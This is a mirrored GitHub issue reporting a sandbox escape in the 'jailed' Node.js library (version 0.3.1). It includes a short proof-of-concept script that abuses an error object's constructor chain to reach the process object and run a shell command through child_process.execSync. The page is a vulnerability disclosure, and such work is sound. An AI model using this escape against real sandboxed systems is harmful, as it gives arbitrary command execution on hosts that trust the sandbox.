Giters

asvd / jailed

execute untrusted code with custom permissions

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Sandbox Escape Bug in jailed with Node.js

seongil-wi opened this issue · comments

commented

  • Jailed version: 0.3.1

  • Node version: 18.15.0

  • run-jailed.js

var jailed = require('jailed');
var api = {};
var plugin = new jailed.Plugin('./test_case.js', api);
  • test_case.js
try{ 
    this.__defineGetter__("x", eval);
    eval.toString = toLocaleString
    eval < x
 } catch(pp){
    pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); 
}

application.disconnect();

Sandbox can be escaped by three lines of code (Notice that each line of code is essential to triggering the bug.)
We can execute arbitrary shell code using process module.